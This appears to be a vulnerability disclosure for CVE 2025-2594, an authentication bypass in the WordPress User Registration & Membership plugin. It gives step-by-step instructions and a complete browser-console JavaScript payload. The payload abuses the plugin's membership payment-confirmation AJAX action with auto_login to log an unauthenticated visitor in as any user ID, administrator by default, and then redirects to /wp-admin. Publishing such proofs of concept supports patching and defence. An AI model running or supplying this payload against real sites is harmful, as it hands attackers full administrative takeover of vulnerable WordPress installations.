User Registration & Membership (Free < 4.1.3, Pro < 5.1.3) – Authentication Bypass | CVE 2025-2594

Description

The plugins do not properly validate data in an AJAX action when the Membership Addon is enabled, allowing attackers to authenticate as any user, including administrators, by simply using the target account's user ID.

Proof of Concept

1. Install the plugin https://wordpress.org/plugins/user-registration/.  
2. Activate the `Membership` addon at `/wp-admin/admin.php?page=user-registration-dashboard#features`.  
3. As unauthenticated, visit `/membership-pricing/` and execute the JavaScript payload below via the browser console, replacing the value of `member_id` with an existing user's ID.
4. Notice that you will be authenticated as the selected user. 

Payload:
```
async function payload(member_id) {

	const security = ur_membership_frontend_localized_data._confirm_payment_nonce;
	
    const formData = new FormData();
    formData.append("action", "user_registration_membership_confirm_payment");
    formData.append("customer_id", 1);
    formData.append("form_response", JSON.stringify({"auto_login":true}));
    formData.append("security", security);
    formData.append("member_id", member_id);

    try {
        const response = await fetch("/wp-admin/admin-ajax.php", {
            method: "POST",
            body: formData
        });

        if (!response.ok) {
            console.error(`Erro na requisição: ${response.status} - ${response.statusText}`);
        } else {
            const result = await response.text();
            console.log("Resposta recebida:", result);
            location.href = "/wp-admin"
        }
    } catch (error) {
        console.error("Erro ao enviar a requisição:", error);
    }
}

payload(1)
```